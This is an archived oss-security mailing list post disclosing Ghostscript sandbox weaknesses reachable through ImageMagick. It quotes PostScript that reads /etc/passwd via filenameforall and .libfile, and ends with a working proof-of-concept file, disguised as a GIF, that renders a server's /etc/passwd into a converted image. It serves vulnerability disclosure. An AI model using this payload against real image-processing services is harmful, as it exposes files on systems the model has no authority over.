Follow @Openwall on Twitter for new release announcements and other news
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Date: Thu, 29 Sep 2016 14:28:28 -0700
From: Tavis Ormandy <taviso@...gle.com>
To: oss-security@...ts.openwall.com
Subject: Re: ImageMagick identify "d:" hangs

On Thu, Sep 29, 2016 at 5:02 AM, Tavis Ormandy <taviso@...gle.com> wrote:
> On Wed, Sep 28, 2016 at 11:25 PM, Florian Weimer <fw@...eb.enyo.de> wrote:
>>
>> * Tavis Ormandy:
>>
>> > Here is the code I'm testing with (Note: I really don't know much
>> > postscript - and I hate it).
>> >
>> > $ cat test.ps
>> > /dumpname {
>> >     dup             % copy filename
>> >     dup             % copy filename
>> >     print           % print filename
>> >     (\n) print      % print newline
>> >     status          % stat filename
>> >     {
>> >         (stat succeeded\n) print
>> >         ( ctime:) print
>> >         64 string cvs print
>> >         ( atime:) print
>> >         64 string cvs print
>> >         ( size:) print
>> >         64 string cvs print
>> >         ( blocks:) print
>> >         64 string cvs print
>> >         (\n) print
>> >         (\n) print
>> >     }{
>> >         (unable to stat\n\n) print
>> >     } ifelse
>> >     .libfile        % open as library
>> >     {
>> >         (.libfile returned file\n\n) print
>> >         64 string readstring
>> >         pop         % discard result (should proably test)
>> >         print
>> >         (\n) print
>> >     }{
>> >         (.libfile returned string\n) print
>> >         print
>> >         (\n) print
>> >     } ifelse
>> > } def
>> >
>> > (/etc/pass*) /dumpname load 256 string filenameforall
>>
>> filenameforall was fixed as part of this:
>>
>>   http://git.ghostscript.com/?p=ghostpdl.git;a=commit;h=ab109aaeb3ddba59518b036fb288402a65cf7ce8
>>   http://bugs.ghostscript.com/show_bug.cgi?id=694724
>>
>> This also covers getenv and has already been assigned CVE-2013-5653.
>
> Thanks Florian, that explains it, although the distros do not appear
> to have picked that patch up.
>
>>
>> > $ identify test.ps
>> > /etc/passwd
>> > stat succeeded
>> >  ctime:1474998792 atime:1474998792 size:2662 blocks:8
>> >
>> > .libfile returned file
>>
>> .libfile is not yet fixed upstream.  I reported this upstream:
>>
>>   http://bugs.ghostscript.com/show_bug.cgi?id=697169
>
> Thanks - seems like bad news for any automated image/document processing.
>
> Tavis.

Just for future reference, here is an example of dumping a file to an
image processed with ImageMagick that works with gs 9.20:

$ cat test.gif
%!PS
/Size 20 def                             % font/line size
/Line 0 def                              % current line
/Buf 1024 string def                     % line buffer
/Path 0 newpath def

/Courier-Bold findfont Size scalefont setfont
1 1 1 setrgbcolor clippath fill          % draw white background
0 0 0 setrgbcolor                        % set black foreground

(/etc/passwd) .libfile {
    {
        dup Buf readline
        {
            Path Line moveto show
        }{
            showpage
            quit
        } ifelse
        % next line
        /Line Line Size add def
    } loop
} if
$ convert test.gif png:test.png

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.